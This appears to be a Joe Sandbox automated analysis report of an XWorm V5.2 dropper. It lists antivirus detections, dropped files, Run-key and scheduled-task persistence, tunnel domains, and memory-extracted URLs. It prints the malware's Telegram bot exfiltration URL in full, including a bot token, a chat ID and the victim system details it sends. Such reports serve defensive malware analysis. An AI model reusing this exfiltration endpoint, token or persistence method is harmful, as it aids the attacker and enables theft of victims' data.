C:\Users\user\AppData\Local\...\Svchost.exe, PE32 16->31 dropped 47 Antivirus detection for dropped file 16->47 49 Multi AV Scanner detection for dropped file 16->49 51 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 16->51 53 3 other signatures 16->53 25 schtasks.exe 1 16->25         started        27 WerFault.exe 22 16 16->27         started        file8 signatures9 process10 process11 29 conhost.exe 25->29         started       

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe72%VirustotalBrowse
                      SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe88%ReversingLabsByteCode-MSIL.Trojan.Cassiopeia
                      SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe100%AviraTR/Dropper.Gen
                      SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\X.exe100%AviraHEUR/AGEN.1305769
                      C:\Users\user\AppData\Local\Temp\Svchost.exe100%AviraHEUR/AGEN.1305769
                      C:\Users\user\AppData\Roaming\X.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\Svchost.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\Svchost.exe82%ReversingLabsByteCode-MSIL.Backdoor.XWorm
                      C:\Users\user\AppData\Local\Temp\Svchost.exe77%VirustotalBrowse
                      C:\Users\user\AppData\Roaming\61c7cdb3196df.exe11%ReversingLabs
                      C:\Users\user\AppData\Roaming\61c7cdb3196df.exe10%VirustotalBrowse
                      C:\Users\user\AppData\Roaming\X.exe82%ReversingLabsByteCode-MSIL.Backdoor.XWorm
                      C:\Users\user\AppData\Roaming\X.exe77%VirustotalBrowse
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      eu-central-7075.packetriot.net13%VirustotalBrowse
                      trusting-smoke-90361.pktriot.net1%VirustotalBrowse
                      SourceDetectionScannerLabelLink
                      http://schemas.mi0%URL Reputationsafe
                      http://schemas.mi0%URL Reputationsafe
                      http://passport.net/tb0%URL Reputationsafe
                      http://Passport.NET/tb(0%Avira URL Cloudsafe
                      http://crl.ver)0%Avira URL Cloudsafe
                      trusting-smoke-90361.pktriot.net0%Avira URL Cloudsafe
                      http://Passport.NET/tbpose0%Avira URL Cloudsafe
                      http://Passport.NET/STS0%Avira URL Cloudsafe
                      http://Passport.NET/tb_0%Avira URL Cloudsafe
                      http://Passport.NET/STS0%VirustotalBrowse
                      trusting-smoke-90361.pktriot.net1%VirustotalBrowse
                      http://Passport.NET/tbpose0%VirustotalBrowse
                      http://Passport.NET/tb_0%VirustotalBrowse
                      http://Passport.NET/tb(0%VirustotalBrowse
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      api.telegram.org
                      149.154.167.220
                      truefalse
                        high
                        eu-central-7075.packetriot.net
                        167.71.56.116
                        truefalseunknown
                        trusting-smoke-90361.pktriot.net
                        unknown
                        unknowntrueunknown
                        NameMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot6731733957:AAGWQfODbJKr7tNuz5LDiFk41dKVxsOuAEA/sendMessage?chat_id=2031060627&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A99B59929CF3A7C56FB7E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20_68WOMU2%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2false
                          high
                          trusting-smoke-90361.pktriot.nettrue
                          • 1%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://schemas.xmlsoap.org/ws/2004/09/policynsvchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://schemas.misvchost.exe, 00000013.00000003.2830208486.000002A0E270F000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/02/scicysvchost.exe, 00000013.00000002.3877954869.000002A0E275F000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://api.telegram.org/botSecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe, 00000000.00000002.1426417330.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, X.exe, 00000002.00000000.1420642813.0000000000962000.00000002.00000001.01000000.00000006.sdmp, X.exe, 00000002.00000002.2839168791.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, X.exe.0.dr, Svchost.exe.2.drfalse
                                high
                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdtp:svchost.exe, 00000013.00000003.2823074307.000002A0E2753000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfsvchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsvchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3877788879.000002A0E2713000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3877954869.000002A0E275F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2832667730.000002A0E2766000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds.xmsvchost.exe, 00000013.00000003.2822692478.000002A0E2754000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://login.microsoftonline.com/ppsecure/ResolveUser.srfsvchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 00000013.00000002.3876200065.000002A0E1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://Passport.NET/STSsvchost.exe, 00000013.00000003.2830225661.000002A0E276E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3878129938.000002A0E276F000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionIDsvchost.exe, 00000013.00000002.3876634036.000002A0E1EC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAsvchost.exe, 00000013.00000002.3877702472.000002A0E2710000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2830208486.000002A0E270F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://Passport.NET/tbposesvchost.exe, 00000013.00000002.3878556121.000002A0E2E5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • 0%, Virustotal, Browse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://login.microsoftonline.com/ppsecure/devicechangecredential.srfrsvchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://schemas.xmlsoap.org/ws/2005/02/scdysvchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuesvchost.exe, 00000013.00000003.2830225661.000002A0E276E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3878129938.000002A0E276F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdchemsvchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://login.microsoftonline.com/ppsecure/EnumerateDevices.srfsvchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 00000013.00000003.2822692478.000002A0E2756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2830225661.000002A0E277F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3877788879.000002A0E2713000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdecurisvchost.exe, 00000013.00000003.2823093029.000002A0E275D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2822692478.000002A0E2756000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://account.live.com/InlineSignup.aspx?iww=1&id=80502svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameX.exe, 00000002.00000002.2839168791.0000000002B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200svchost.exe, 00000013.00000003.2823074307.000002A0E2753000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsis-2svchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://signup.live.com/signup.aspxsvchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://Passport.NET/tb_svchost.exe, 00000013.00000002.3878729555.000002A0E2EA9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • 0%, Virustotal, Browse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80601svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802614463.000002A0E2756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802274058.000002A0E2752000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80600svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdema#1svchost.exe, 00000013.00000003.2823074307.000002A0E2753000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80603svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802614463.000002A0E2756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802274058.000002A0E2752000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2004/09/policysvchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3877788879.000002A0E2713000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2830225661.000002A0E276E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3878129938.000002A0E276F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2832667730.000002A0E2766000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussvchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80605svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802614463.000002A0E2756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802274058.000002A0E2752000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80604svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802614463.000002A0E2756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802274058.000002A0E2752000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://account.live.com/msangcwamsvchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802443282.000002A0E2757000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802274058.000002A0E2752000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srfsvchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://crl.ver)svchost.exe, 00000013.00000002.3876943198.000002A0E1ED6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              low
                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsoasvchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://passport.net/tbsvchost.exe, 00000013.00000002.3878556121.000002A0E2E5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://upx.sf.netAmcache.hve.18.drfalse
                                                                                                  high
                                                                                                  https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfsvchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdxmlsvchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfsvchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://account.live.com/Wizard/Password/Change?id=80601svchost.exe, 00000013.00000003.2802186677.000002A0E272C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802186677.000002A0E2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802614463.000002A0E2756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802274058.000002A0E2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlns:psvchost.exe, 00000013.00000003.2823074307.000002A0E2753000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/scsvchost.exe, 00000013.00000002.3877788879.000002A0E2713000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3877954869.000002A0E275F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2832667730.000002A0E2766000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://account.live.com/inlinesignup.aspx?iww=1&id=80600svchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdcuritysvchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 00000013.00000003.2830225661.000002A0E276E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3878129938.000002A0E276F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3878483640.000002A0E2E3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAsvchost.exe, 00000013.00000002.3877702472.000002A0E2710000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2830208486.000002A0E270F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://login.microsoftonline.com/ppsecure/DeviceUpdate.srfsvchost.exe, 00000013.00000002.3876128013.000002A0E1E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://Passport.NET/tb(svchost.exe, 00000013.00000003.2830225661.000002A0E276E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3878129938.000002A0E276F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • 0%, Virustotal, Browse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://account.live.com/inlinesignup.aspx?iww=1&id=80605svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsa=svchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trustmsvchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://account.live.com/inlinesignup.aspx?iww=1&id=80603svchost.exe, 00000013.00000003.2802421840.000002A0E273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802468284.000002A0E2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://account.live.com/inlinesignup.aspx?iww=1&id=80604svchost.exe, 00000013.00000003.2802489659.000002A0E2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3876277933.000002A0E1E66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdsvchost.exe, 00000013.00000003.2822692478.000002A0E2756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3877702472.000002A0E2710000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2830159057.000002A0E2757000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3877855648.000002A0E2737000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2830225661.000002A0E277F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2830208486.000002A0E270F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2823074307.000002A0E2753000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.2830182692.000002A0E2759000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      • No. of IPs < 25%
                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                      • 75% < No. of IPs
                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                      149.154.167.220
                                                                                                                                      api.telegram.orgUnited Kingdom
                                                                                                                                      62041TELEGRAMRUfalse
                                                                                                                                      167.71.56.116
                                                                                                                                      eu-central-7075.packetriot.netUnited States
                                                                                                                                      14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                      Joe Sandbox version:39.0.0 Ruby
                                                                                                                                      Analysis ID:1387375
                                                                                                                                      Start date and time:2024-02-06 09:32:18 +01:00
                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                      Overall analysis duration:0h 8m 44s
                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                      Report type:full
                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                      Number of analysed new started processes analysed:24
                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                      Technologies:
                                                                                                                                      • HCA enabled
                                                                                                                                      • EGA enabled
                                                                                                                                      • AMSI enabled
                                                                                                                                      Analysis Mode:default
                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                      Sample name:SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe
                                                                                                                                      Detection:MAL
                                                                                                                                      Classification:mal100.troj.evad.winEXE@15/12@9/2
                                                                                                                                      EGA Information:Failed
                                                                                                                                      HCA Information:
                                                                                                                                      • Successful, ratio: 98%
                                                                                                                                      • Number of executed functions: 61
                                                                                                                                      • Number of non-executed functions: 1
                                                                                                                                      Cookbook Comments:
                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, Svchost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, schtasks.exe
                                                                                                                                      • Excluded IPs from analysis (whitelisted): 40.126.29.10, 40.126.29.8, 40.126.29.11, 40.126.29.5, 40.126.29.14, 20.190.157.11, 40.126.29.6, 40.126.29.13, 52.182.143.212
                                                                                                                                      • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                      • Execution Graph export aborted for target SecuriteInfo.com.Trojan.MulDrop23.34226.5725.23706.exe, PID 1072 because it is empty
                                                                                                                                      • Execution Graph export aborted for target X.exe, PID 3280 because it is empty
                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                      TimeTypeDescription
                                                                                                                                      08:33:25AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Svchost C:\Users\user\AppData\Local\Temp\Svchost.exe
                                                                                                                                      08:33:26Task SchedulerRun new task: Svchost path: C:\Users\user\AppData\Local\Temp\Svchost.exe
                                                                                                                                      08:33:33AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Svchost C:\Users\user\AppData\Local\Temp\Svchost.exe
                                                                                                                                      08:33:41AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Svchost.lnk
                                                                                                                                      09:33:26API Interceptor4283337x Sleep call for process: X.exe modified
                                                                                                                                      09:35:42API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      149.154.167.220https://www.mediafire.com/file/8eop2r1ad81z2k2/Sipari%C5%9F+&Ouml;zellikleri+pdf.tgz/fileGet hashmaliciousAgentTeslaBrowse
                                                                                                                                        A1234.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          SecuriteInfo.com.Win32.PWSX-gen.19724.10468.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            1.jsGet hashmaliciousAMSIReaperBrowse
